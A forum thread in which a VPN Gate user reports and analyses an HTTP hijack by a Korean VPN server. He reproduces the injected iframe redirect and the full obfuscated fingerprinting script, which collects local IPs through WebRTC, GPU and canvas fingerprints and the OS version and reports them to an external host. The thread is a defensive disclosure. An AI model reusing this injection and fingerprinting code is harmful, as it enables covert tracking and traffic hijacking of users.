Malicious server?

Post your questions about VPN Gate Academic Experiment Service here. Please answer questions if you can afford.
Post Reply
g10
Posts: 2
Joined: Wed Sep 08, 2021 7:14 am

Malicious server?

Post by g10 » Wed Sep 08, 2021 9:04 am

I've caught one of the VPNs hijacking an http connection. Specifically I was downloading the vpngate url "http://www.vpngate.net/api/iphone/", which should send back content that is a CSV formatted list of vpn servers. Instead this is what I got:

Code: Select all

<meta http-equiv="refresh"content="2;url=http://www.vpngate.net/?"/><iframe id="f"frameborder="0"style="width:1;height:1">
</iframe><script>document.getElementById("f").src="http://59.22.238.233/tm/?a=FF&b=ETC&c=300022963470&d=32&e=9301&f=d3d3LnZwbmdhdGUubmV0L2FwaS9pcGhvbmUv&g=1631083039933&h="+Date.now()+"&y=0&z=0&x=1&w=2021-08-26&in=9301_1537_00022038&id=20210908"</script>
If I go to that link it sends back some obsfucated javascript which takes you to "http://www.vpngate.net/api/iphone/", obviously so that I wouldn't know the difference. That link is already stale, so you won't see the what I suspect is the real malicious code. However, if you change the "g" parameter to a more recent date (in your browser console do "Date.now()" to get the number to replace the "g" value with), you'll get the something that looks more malicious.
<!DOCTYPE html><html><body><form id="fa"method="post"target="_top"><input type="hidden"name="c"value="300022963470"/><input type="hidden"name="f"value="d3d3LnZwbmdhdGUubmV0L2FwaS9pcGhvbmUv"/><input type="hidden" name="o" value=""/><input type="hidden"name="p"value="2021-08-26"/><input type="hidden" name="a" value="FF"/></form><script>function getFormatDate(date){var year=date.getFullYear();var month=(1+date.getMonth());month=month>=10?month:'0'+month;var day=date.getDate();day=day>=10?day:'0'+day;return year+'-'+month+'-'+day}var lk='siv10';var isNew=0;var isS=0;try{localStorage.getItem('t');localStorage.setItem('t','t')}catch(e){isS=1}if(isS==0&&localStorage.getItem(lk)==null){var j={'d':getFormatDate(new Date()),'v':'L'+Math.random().toString().substr(2,16)};localStorage.setItem(lk,JSON.stringify(j));isNew=1}var di={p1:'d3d3LnZwbmdhdGUubmV0L2FwaS9pcGhvbmUv',p2:'300022963470',p3:32,p4:9301,p5:'2021-08-26',p6:1,p7:0,p8:0,I1:'UN',I2:'UN',I3:'FF',I4:-1,I5:'ETC',I7:(isS==0?JSON.parse(localStorage.getItem(lk)).d:'1900-01-01'),I6:(isS==0?JSON.parse(localStorage.getItem(lk)).v:0),I8:(isS==0?isNew:0),I9:1,I10:0,I11:'9301_1537_00022038',t1:1631087344488,t2:0,t3:0,t4:0};function f1(){var m1="",m2,m3,m4,m5,m6,m7,m8,m9=0,ma="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";mb=di.p1.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(m9<mb.length){m5=ma.indexOf(mb.charAt(m9++));m6=ma.indexOf(mb.charAt(m9++));m7=ma.indexOf(mb.charAt(m9++));m8=ma.indexOf(mb.charAt(m9++));m2=(m5<<2)|(m6>>4);m3=((m6&15)<<4)|(m7>>2);m4=((m7&3)<<6)|m8;m1=m1+String.fromCharCode(m2);if(m7!=64)m1=m1+String.fromCharCode(m3);if(m8!=64)m1=m1+String.fromCharCode(m4)}parent.location.href='http://'+m1}function f2(p1,p2){var m1,m2,m3,m4,m5,m6,m6,m7;m1=p1.length&3;m2=p1.length-m1;m3=p2;m5=0xcc9e2d51;m6=0x1b873593;m7=0;while(m7<m2){m6=((p1.charCodeAt(m7)&0xff))|((p1.charCodeAt(++m7)&0xff)<<8)|((p1.charCodeAt(++m7)&0xff)<<16)|((p1.charCodeAt(++m7)&0xff)<<24);++m7;m6=((((m6&0xffff)*m5)+((((m6>>>16)*m5)&0xffff)<<16)))&0xffffffff;m6=(m6<<15)|(m6>>>17);m6=((((m6&0xffff)*m6)+((((m6>>>16)*m6)&0xffff)<<16)))&0xffffffff;m3^=m6;m3=(m3<<13)|(m3>>>19);m4=((((m3&0xffff)*5)+((((m3>>>16)*5)&0xffff)<<16)))&0xffffffff;m3=(((m4&0xffff)+0x6b64)+((((m4>>>16)+0xe654)&0xffff)<<16))}m6=0;switch(m1){case 3:m6^=(p1.charCodeAt(m7+2)&0xff)<<16;case 2:m6^=(p1.charCodeAt(m7+1)&0xff)<<8;case 1:m6^=(p1.charCodeAt(m7)&0xff);m6=(((m6&0xffff)*m5)+((((m6>>>16)*m5)&0xffff)<<16))&0xffffffff;m6=(m6<<15)|(m6>>>17);m6=(((m6&0xffff)*m6)+((((m6>>>16)*m6)&0xffff)<<16))&0xffffffff;m3^=m6}m3^=p1.length;m3^=m3>>>16;m3=(((m3&0xffff)*0x85ebca6b)+((((m3>>>16)*0x85ebca6b)&0xffff)<<16))&0xffffffff;m3^=m3>>>13;m3=((((m3&0xffff)*0xc2b2ae35)+((((m3>>>16)*0xc2b2ae35)&0xffff)<<16)))&0xffffffff;m3^=m3>>>16;return m3>>>0}setTimeout(function(){try{var m1=window.RTCPeerConnection||window.mozRTCPeerConnection||window.webkitRTCPeerConnection,m2={optional:[{}]},m3={iceServers:[{}]},m4=new m1(m3,m2),m5=/([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/,m6=1}catch(e){di.I1='NS';return}function f1(p1){var m1=m5.exec(p1)[1];if(m1.match(/^(192\.168\.|169\.254\.|10\.|172\.(1[6-9]|2\d|3[01]))/)){di.I1=m1;m4.onicecandidate=null}else if(m6){di.I1=m1;m6=0}}m4.onicecandidate=function(p1){if(p1.candidate)f1(p1.candidate.candidate)};m4.createDataChannel('');m4.createOffer(function(p1){m4.setLocalDescription(p1,function(){},function(){})},function(){})},0);setTimeout(function(){try{var m1=document.createElement('canvas');var m2=m1.getContext("webgl")||m1.getContext('experimental-webgl');var m3=m2.getExtension('WEBGL_debug_renderer_info');di.I2=m2.getParameter(m3.UNMASKED_RENDERER_WEBGL);var m4,m5;m4=di.I2.indexOf("ANGLE (",0);if(m4>-1){m4+=7;m5=di.I2.indexOf("Direct",m4);if(m5>-1){di.I2=di.I2.substr(m4,m5-m4)}}di.I2=di.I2.replace(/\s/gi,'')}catch(e){di.I2='NS'}},0);setTimeout(function(){try{var m1=document.createElement('canvas'),m2,m3="so.in<co> 2.0";m1.setAttribute("width",300);m1.setAttribute("height",200);m2=m1.getContext('2d');m2.textBaseline="top";m2.font="14px 'Arial'";m2.textBaseline="alphabetic";m2.fillStyle="#f60";m2.fillRect(125,1,62,20);m2.fillStyle="#069";m2.fillText(m3,2,15);m2.fillStyle="rgba(102, 204, 0, 0.7)";m2.fillText(m3,4,17);di.I10=f2(m1.toDataURL().replace("data:image/png;base64,",""),31)}catch(e){di.I10=-1}},0);setTimeout(function(){var m1;if(window.webkitRequestFileSystem){window.webkitRequestFileSystem(window.TEMPORARY,1,function(){m1=0},function(e){m1=1})}else if((di.I3=='IE'&&document.documentMode>=10)||di.I3=='ED'){m1=0;try{if(!window.indexedDB){m1=1}}catch(e){m1=1}}else if(di.I3=='FF'&&window.indexedDB){try{var m2=window.indexedDB.open('test')}catch(e){m1=1}if(typeof m1==='undefined'){f1(function(){return m2.readyState==='done'?1:0},function(p1){if(!p1){m1=m2.result?0:1}})}}else if(di.I3=='SF'&&window.localStorage){try{window.localStorage.setItem('test',1)}catch(e){m1=1}if(typeof m1==='undefined'){m1=0}}f1(function(){return typeof m1!=='undefined'?1:0},function(){if(m1==='undefined'?0:m1?1:0){di.I4=1;di.I6='PV'}else{di.I4=0}});function f1(p1,p2){var m1=0,m2=50,m3=10,m4=0;var m5=setInterval(function(){if(p1()){window.clearInterval(m5);p2(m4)}if(m1++>m2){window.clearInterval(m5);m4=1;p2(m4)}},10)}},0);setTimeout(function(){var ua=navigator.userAgent.replace(/ /g,'');if(di.I3==='CR'){di.t4=(ua.match(/(chrome(?=\/))\/?\s*(\d+)/i)||[])[2]}},0);setTimeout(function(){var ua=navigator.userAgent.replace(/ /g,'');if(di.I5==='ETC'||di.I5==='WIN'){if(ua.indexOf("WindowsNT5.1")!=-1){di.I5="WINXP"}else if(ua.indexOf("WindowsNT6.0")!=-1){di.I5="WINVT"}else if(ua.indexOf("WindowsNT6.1")!=-1){di.I5="WIN7"}else if(ua.indexOf("WindowsNT6.2")!=-1){di.I5="WIN8"}else if(ua.indexOf("WindowsNT6.3")!=-1){di.I5="WIN8.1"}else if(ua.indexOf("WindowsNT10.0")!=-1){di.I5="WIN10"}if(ua.indexOf("(compatible;")>-1){di.I5=di.I5+"C"}}},0);var m1=0,m2=setInterval(function(){if(m1>=10||(di.I6!==''&&di.I2!=='UN'&&di.I4!==-1)){clearInterval(m2);var m3,m4;if(window.XMLHttpRequest){m3=new XMLHttpRequest()}else{m3=new ActiveXObject('Microsoft.XMLHTTP')}try{m4=window.performance.timing;di.t2=m4.requestStart;di.t3=m4.responseEnd}catch(e){di.t2=di.t3=new Date().getTime()}m3.open('GET','tms.das?a='+di.I3+'&b='+di.I5+'&c='+di.p2+'&d='+di.p3+'&e='+di.p4+'&g='+di.t1+'&h='+di.t2+'&i='+di.t3+'&l='+di.I1+'&m='+di.I7+'&n='+(di.I4===1?'PV':di.I6)+'&o='+di.I8+'&p='+di.I2+"&q="+di.I9+"&r="+di.I10+"&k="+di.I11,true);m3.setRequestHeader('Content-Type','application/x-www-form-urlencoded;charset=euc-kr');m3.onreadystatechange=function(){if(m3.readyState==4&&m3.status==200){var m1=m3.responseText.split(':');if(m1[0]==='0'){var of=document.getElementById("fa");of.o.value=m1[2];of.action="nt/"+m1[1]+".das";if(di.p6===1){if(di.I3==='CR'||di.I3==='ED'||di.I3==='WH'||di.I3==='SF'||di.I3==='OP'){if(di.I3!='WH'){window.parent.postMessage({childData:'das message'},'*')}of.target='_self';of.submit()}else of.submit()}else{window.open("","N_POP","width="+m1[3]+"px,height="+m1[4]+"px,left=0,top=0");of.target="N_POP";of.submit();f1()}}else{f1()}}};m3.send()}m1++},10);</script></body></html>
The first thing I notice is that its checking what version of the operating system its running on (perhaps to give tailored malware?). Its clearly going to do a request to "tms.das?..." given the right conditions. Playing around with it a little, it looks like most of the code is finger printing. Some of the parameters on the request are OS and graphics card type. Notice the input variable "f" with value "d3d3LnZwbmdhdGUubmV0L2FwaS9pcGhvbmUv". If you base64 decode that value, you get "www.vpngate.net/api/iphone/", which was the url I was fetching. So I suspect that this malware is not related to the url, but would try to hijack any http (non secure) connection. Also you can notice the Content-Type header is set to "application/x-www-form-urlencoded;charset=euc-kr", which is a korean character set. This corresponds to the fact that the VPN said it was from Korea.
Screenshot from 2021-09-08 08-53-03.cropped.png
Here is a cropped screenshot of the vpn in the html table. Notice that its had almost 250,000 users. I wonder how many have been compromised.

The url used to download the openvpn config was (though it won't send the config anymore):
And the openvpn config file in case anyone wants to investigate.

Code: Select all

###############################################################################
# OpenVPN 2.0 Sample Configuration File
# for PacketiX VPN / SoftEther VPN Server
# 
# !!! AUTO-GENERATED BY SOFTETHER VPN SERVER MANAGEMENT TOOL !!!
# 
# !!! YOU HAVE TO REVIEW IT BEFORE USE AND MODIFY IT AS NECESSARY !!!
# 
# This configuration file is auto-generated. You might use this config file
# in order to connect to the PacketiX VPN / SoftEther VPN Server.
# However, before you try it, you should review the descriptions of the file
# to determine the necessity to modify to suitable for your real environment.
# If necessary, you have to modify a little adequately on the file.
# For example, the IP address or the hostname as a destination VPN Server
# should be confirmed.
# 
# Note that to use OpenVPN 2.0, you have to put the certification file of
# the destination VPN Server on the OpenVPN Client computer when you use this
# config file. Please refer the below descriptions carefully.


###############################################################################
# Specify the type of the layer of the VPN connection.
# 
# To connect to the VPN Server as a "Remote-Access VPN Client PC",
#  specify 'dev tun'. (Layer-3 IP Routing Mode)
#
# To connect to the VPN Server as a bridging equipment of "Site-to-Site VPN",
#  specify 'dev tap'. (Layer-2 Ethernet Bridgine Mode)

dev tun


###############################################################################
# Specify the underlying protocol beyond the Internet.
# Note that this setting must be correspond with the listening setting on
# the VPN Server.
# 
# Specify either 'proto tcp' or 'proto udp'.

proto udp


###############################################################################
# The destination hostname / IP address, and port number of
# the target VPN Server.
# 
# You have to specify as 'remote <HOSTNAME> <PORT>'. You can also
# specify the IP address instead of the hostname.
# 
# Note that the auto-generated below hostname are a "auto-detected
# IP address" of the VPN Server. You have to confirm the correctness
# beforehand.
# 
# When you want to connect to the VPN Server by using TCP protocol,
# the port number of the destination TCP port should be same as one of
# the available TCP listeners on the VPN Server.
# 
# When you use UDP protocol, the port number must same as the configuration
# setting of "OpenVPN Server Compatible Function" on the VPN Server.

remote 222.97.105.167 1195


###############################################################################
# The HTTP/HTTPS proxy setting.
# 
# Only if you have to use the Internet via a proxy, uncomment the below
# two lines and specify the proxy address and the port number.
# In the case of using proxy-authentication, refer the OpenVPN manual.

;http-proxy-retry
;http-proxy [proxy server] [proxy port]


###############################################################################
# The encryption and authentication algorithm.
# 
# Default setting is good. Modify it as you prefer.
# When you specify an unsupported algorithm, the error will occur.
# 
# The supported algorithms are as follows:
#  cipher: [NULL-CIPHER] NULL AES-128-CBC AES-192-CBC AES-256-CBC BF-CBC
#          CAST-CBC CAST5-CBC DES-CBC DES-EDE-CBC DES-EDE3-CBC DESX-CBC
#          RC2-40-CBC RC2-64-CBC RC2-CBC
#  auth:   SHA SHA1 MD5 MD4 RMD160

cipher AES-128-CBC
auth SHA1


###############################################################################
# Other parameters necessary to connect to the VPN Server.
# 
# It is not recommended to modify it unless you have a particular need.

resolv-retry infinite
nobind
persist-key
persist-tun
client
verb 3
#auth-user-pass


###############################################################################
# The certificate file of the destination VPN Server.
# 
# The CA certificate file is embedded in the inline format.
# You can replace this CA contents if necessary.
# Please note that if the server certificate is not a self-signed, you have to
# specify the signer's root certificate (CA) here.

<ca>
-----BEGIN CERTIFICATE-----
MIIF3jCCA8agAwIBAgIQAf1tMPyjylGoG7xkDjUDLTANBgkqhkiG9w0BAQwFADCB
iDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0pl
cnNleSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNV
BAMTJVVTRVJUcnVzdCBSU0EgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMTAw
MjAxMDAwMDAwWhcNMzgwMTE4MjM1OTU5WjCBiDELMAkGA1UEBhMCVVMxEzARBgNV
BAgTCk5ldyBKZXJzZXkxFDASBgNVBAcTC0plcnNleSBDaXR5MR4wHAYDVQQKExVU
aGUgVVNFUlRSVVNUIE5ldHdvcmsxLjAsBgNVBAMTJVVTRVJUcnVzdCBSU0EgQ2Vy
dGlmaWNhdGlvbiBBdXRob3JpdHkwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK
AoICAQCAEmUXNg7D2wiz0KxXDXbtzSfTTK1Qg2HiqiBNCS1kCdzOiZ/MPans9s/B
3PHTsdZ7NygRK0faOca8Ohm0X6a9fZ2jY0K2dvKpOyuR+OJv0OwWIJAJPuLodMkY
tJHUYmTbf6MG8YgYapAiPLz+E/CHFHv25B+O1ORRxhFnRghRy4YUVD+8M/5+bJz/
Fp0YvVGONaanZshyZ9shZrHUm3gDwFA66Mzw3LyeTP6vBZY1H1dat//O+T23LLb2
VN3I5xI6Ta5MirdcmrS3ID3KfyI0rn47aGYBROcBTkZTmzNg95S+UzeQc0PzMsNT
79uq/nROacdrjGCT3sTHDN/hMq7MkztReJVni+49Vv4M0GkPGw/zJSZrM233bkf6
c0Plfg6lZrEpfDKEY1WJxA3Bk1QwGROs0303p+tdOmw1XNtB1xLaqUkL39iAigmT
Yo61Zs8liM2EuLE/pDkP2QKe6xJMlXzzawWpXhaDzLhn4ugTncxbgtNMs+1b/97l
c6wjOy0AvzVVdAlJ2ElYGn+SNuZRkg7zJn0cTRe8yexDJtC/QV9AqURE9JnnV4ee
UB9XVKg+/XRjL7FQZQnmWEIuQxpMtPAlR1n6BB6T1CZGSlCBst6+eLf8ZxXhyVeE
Hg9j1uliutZfVS7qXMYoCAQlObgOK6nyTJccBz8NUvXt7y+CDwIDAQABo0IwQDAd
BgNVHQ4EFgQUU3m/WqorSs9UgOHYm8Cd8rIDZsswDgYDVR0PAQH/BAQDAgEGMA8G
A1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQEMBQADggIBAFzUfA3P9wF9QZllDHPF
Up/L+M+ZBn8b2kMVn54CVVeWFPFSPCeHlCjtHzoBN6J2/FNQwISbxmtOuowhT6KO
VWKR82kV2LyI48SqC/3vqOlLVSoGIG1VeCkZ7l8wXEskEVX/JJpuXior7gtNn3/3
ATiUFJVDBwn7YKnuHKsSjKCaXqeYalltiz8I+8jRRa8YFWSQEg9zKC7F4iRO/Fjs
8PRF/iKz6y+O0tlFYQXBl2+odnKPi4w2r78NBc5xjeambx9spnFixdjQg3IM8WcR
iQycE0xyNN+81XHfqnHd4blsjDwSXWXavVcStkNr/+XeTWYRUc+ZruwXtuhxkYze
Sf7dNXGiFSeUHM9h4ya7b6NnJSFd5t0dCy5oGzuCr+yDZ4XUmFF0sbmZgIn/f3gZ
XHlKYC6SQK5MNyosycdiyA5d9zZbyuAlJQG03RoHnHcAP9Dc1ew91Pq7P8yF1m9/
qS3fuQL39ZeatTXaw2ewh0qpKJ4jjv9cJ2vhsE/zB+4ALtRZh8tSQZXq9EfX7mRB
VXyNWQKV3WKdwrnuWih0hKWbt5DHDAff9Yk2dDLWKMGwsAvgnEzDHNb842m1R0aB
L6KCq9NjRHDEjf8tM7qtj3u1cIiuPhnPQCjY/MiQu12ZIvVS5ljFH4gxQ+6IHdfG
jjxDah2nGN59PRbxYvnKkKj9
-----END CERTIFICATE-----

</ca>


###############################################################################
# The client certificate file (dummy).
# 
# In some implementations of OpenVPN Client software
# (for example: OpenVPN Client for iOS),
# a pair of client certificate and private key must be included on the
# configuration file due to the limitation of the client.
# So this sample configuration file has a dummy pair of client certificate
# and private key as follows.

<cert>
-----BEGIN CERTIFICATE-----
MIICxjCCAa4CAQAwDQYJKoZIhvcNAQEFBQAwKTEaMBgGA1UEAxMRVlBOR2F0ZUNs
aWVudENlcnQxCzAJBgNVBAYTAkpQMB4XDTEzMDIxMTAzNDk0OVoXDTM3MDExOTAz
MTQwN1owKTEaMBgGA1UEAxMRVlBOR2F0ZUNsaWVudENlcnQxCzAJBgNVBAYTAkpQ
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5h2lgQQYUjwoKYJbzVZA
5VcIGd5otPc/qZRMt0KItCFA0s9RwReNVa9fDRFLRBhcITOlv3FBcW3E8h1Us7RD
4W8GmJe8zapJnLsD39OSMRCzZJnczW4OCH1PZRZWKqDtjlNca9AF8a65jTmlDxCQ
CjntLIWk5OLLVkFt9/tScc1GDtci55ofhaNAYMPiH7V8+1g66pGHXAoWK6AQVH67
XCKJnGB5nlQ+HsMYPV/O49Ld91ZN/2tHkcaLLyNtywxVPRSsRh480jju0fcCsv6h
p/0yXnTB//mWutBGpdUlIbwiITbAmrsbYnjigRvnPqX1RNJUbi9Fp6C2c/HIFJGD
ywIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQChO5hgcw/4oWfoEFLu9kBa1B//kxH8
hQkChVNn8BRC7Y0URQitPl3DKEed9URBDdg2KOAz77bb6ENPiliD+a38UJHIRMqe
UBHhllOHIzvDhHFbaovALBQceeBzdkQxsKQESKmQmR832950UCovoyRB61UyAV7h
+mZhYPGRKXKSJI6s0Egg/Cri+Cwk4bjJfrb5hVse11yh4D9MHhwSfCOH+0z4hPUT
Fku7dGavURO5SVxMn/sL6En5D+oSeXkadHpDs+Airym2YHh15h0+jPSOoR6yiVp/
6zZeZkrN43kuS73KpKDFjfFPh8t4r1gOIjttkNcQqBccusnplQ7HJpsk
-----END CERTIFICATE-----

</cert>

<key>
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEA5h2lgQQYUjwoKYJbzVZA5VcIGd5otPc/qZRMt0KItCFA0s9R
wReNVa9fDRFLRBhcITOlv3FBcW3E8h1Us7RD4W8GmJe8zapJnLsD39OSMRCzZJnc
zW4OCH1PZRZWKqDtjlNca9AF8a65jTmlDxCQCjntLIWk5OLLVkFt9/tScc1GDtci
55ofhaNAYMPiH7V8+1g66pGHXAoWK6AQVH67XCKJnGB5nlQ+HsMYPV/O49Ld91ZN
/2tHkcaLLyNtywxVPRSsRh480jju0fcCsv6hp/0yXnTB//mWutBGpdUlIbwiITbA
mrsbYnjigRvnPqX1RNJUbi9Fp6C2c/HIFJGDywIDAQABAoIBAERV7X5AvxA8uRiK
k8SIpsD0dX1pJOMIwakUVyvc4EfN0DhKRNb4rYoSiEGTLyzLpyBc/A28Dlkm5eOY
fjzXfYkGtYi/Ftxkg3O9vcrMQ4+6i+uGHaIL2rL+s4MrfO8v1xv6+Wky33EEGCou
QiwVGRFQXnRoQ62NBCFbUNLhmXwdj1akZzLU4p5R4zA3QhdxwEIatVLt0+7owLQ3
lP8sfXhppPOXjTqMD4QkYwzPAa8/zF7acn4kryrUP7Q6PAfd0zEVqNy9ZCZ9ffho
zXedFj486IFoc5gnTp2N6jsnVj4LCGIhlVHlYGozKKFqJcQVGsHCqq1oz2zjW6LS
oRYIHgECgYEA8zZrkCwNYSXJuODJ3m/hOLVxcxgJuwXoiErWd0E42vPanjjVMhnt
KY5l8qGMJ6FhK9LYx2qCrf/E0XtUAZ2wVq3ORTyGnsMWre9tLYs55X+ZN10Tc75z
4hacbU0hqKN1HiDmsMRY3/2NaZHoy7MKnwJJBaG48l9CCTlVwMHocIECgYEA8jby
dGjxTH+6XHWNizb5SRbZxAnyEeJeRwTMh0gGzwGPpH/sZYGzyu0SySXWCnZh3Rgq
5uLlNxtrXrljZlyi2nQdQgsq2YrWUs0+zgU+22uQsZpSAftmhVrtvet6MjVjbByY
DADciEVUdJYIXk+qnFUJyeroLIkTj7WYKZ6RjksCgYBoCFIwRDeg42oK89RFmnOr
LymNAq4+2oMhsWlVb4ejWIWeAk9nc+GXUfrXszRhS01mUnU5r5ygUvRcarV/T3U7
TnMZ+I7Y4DgWRIDd51znhxIBtYV5j/C/t85HjqOkH+8b6RTkbchaX3mau7fpUfds
Fq0nhIq42fhEO8srfYYwgQKBgQCyhi1N/8taRwpk+3/IDEzQwjbfdzUkWWSDk9Xs
H/pkuRHWfTMP3flWqEYgW/LW40peW2HDq5imdV8+AgZxe/XMbaji9Lgwf1RY005n
KxaZQz7yqHupWlLGF68DPHxkZVVSagDnV/sztWX6SFsCqFVnxIXifXGC4cW5Nm9g
va8q4QKBgQCEhLVeUfdwKvkZ94g/GFz731Z2hrdVhgMZaU/u6t0V95+YezPNCQZB
wmE9Mmlbq1emDeROivjCfoGhR3kZXW1pTKlLh6ZMUQUOpptdXva8XxfoqQwa3enA
M7muBbF0XN7VO80iJPv+PmIZdEIAkpwKfi201YB+BafCIuGxIF50Vg==
-----END RSA PRIVATE KEY-----

</key>
I don't think the connection is hijacked everytime, since I've fetched the url many times and only seen it hijacked once. It may try to do it only once soon after connection to the VPN, but I haven't tested that. So this is a friendly reminder that you're potentially opening up yourself to an extra MITM attack vector when using these VPNs. I guess its another one of those "you get what you pay for" kind of deals.
You do not have the required permissions to view the files attached to this post.

g10
Posts: 2
Joined: Wed Sep 08, 2021 7:14 am

Re: Malicious server?

Post by g10 » Wed Sep 08, 2021 11:17 pm

Upon further googling and inspection, here's a packet dump from someone who was being caught by this. It shows a valid reply for "tms.das" url, which contains the last component of another potential url, namely "/tm/nt/ip_T3", which doesn't get fetched here before the first value of the returned colon delimited data is 1 (that url is posted to when value is 0).

Packet dump: https://packettotal.com/app/analysis?id ... &name=http

Googling for "tm/tms.das?a=" shows quite a few server over many year using this malware, and all appear to be korean.

Here's actually a pretty decent write on what the script is doing (via google translate because its in korean) and it has a solution for blocking this from in the browser: https://translate.google.com/translate? ... ch&pto=aue

Here's a post from a user about this issue of getting redirected. It turns out that their provider KT (Korea Telecom) is the one hijacking the conenction. Supposedly not more than 2 computers are supposed to be using the same internet connection.
https://translate.google.com/translate? ... ch&pto=aue

Wow, as noted in the post, this seems like its probably illegal. This explains why this came from a Korean VPN, the host must have KT as their internet provider.

Post Reply